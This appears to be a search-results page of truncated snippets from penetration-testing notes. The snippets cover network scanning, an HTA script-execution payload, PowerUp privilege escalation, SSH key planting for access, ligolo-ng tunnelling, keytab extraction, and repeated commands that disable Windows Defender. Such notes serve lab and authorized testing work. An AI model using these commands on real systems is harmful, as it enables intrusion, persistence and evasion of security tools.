Search Results

Automated approach autorecon TARGET_IP Manual approach nmap TARGET_IP -p- --min-rate 1400 -sV -T 4 -sC -oN output.txt If the target is Windows use the below nmap TARGET_IP -Pn -sV -T 4 -sC -oN output.txt #or this if you want to dive deeper nmap TARG...

HTA payloads Ping <html> <head> <script language="JScript"> var shell = new ActiveXObject("WScript.Shell"); var res = shell.Run("ping -n YOUR_IP"); </script> </head> <body> <script language="JScript"> self.close(); </script> </body> </html> ...

PowerUp Upload the following script to the host /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 Load on the target and run it . .\\PowerUp.ps1 Invoke-AllChecks Troubleshoot, make sure the service you are trying to abuse is actua...

Blast AV and enable RDP with hashes cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -removedefinitions -all REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f REG ADD "HKLM...

Linux - SSH On your host cat ~/.ssh/id_rsa.pub # if you don't have one create run: ssh-key -t rsa # copy the content of the file into **authorized_keys** on the target host On the target host cd ~/.ssh/ ssh-keygen -t rsa # press enter twice cat id_r...

You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Applocker or CLM. sudo apt install ligolo-ng ligolo-ng-common-binaries -y Basic tunnel start ligolo-proxy sudo ligolo-proxy -selfcert Connect the agent ...

Tools required <https://github.com/its-a-feature/KeytabParser> <https://github.com/sosdave/KeyTabExtract> I usually install them under /opt/linuxad You will need to upload them on to the target host. Extracting keytab data Most likely you will need to ...

Via command prompt cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -removedefinitions -all Just to be safe 🙂 REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f REG ADD "HKLM\\...

Port Service 7 ECHO 9 Discard 13 Daytime 17 QotD (Quote of the Day) 19 Chargen 20 FTP (data) 21 FTP (control) 22 SSH 23 Telnet 43 Whois 49 TACACS+ 53 DNS 67...

The operating system sets the initial TTL value or application creating the IP packet. Here are some common default TTL values: Operating System TTL Value Linux/MAC OS, Android, Juniper 64 Windows 95, 98, NT 32 Windows 128 Ci...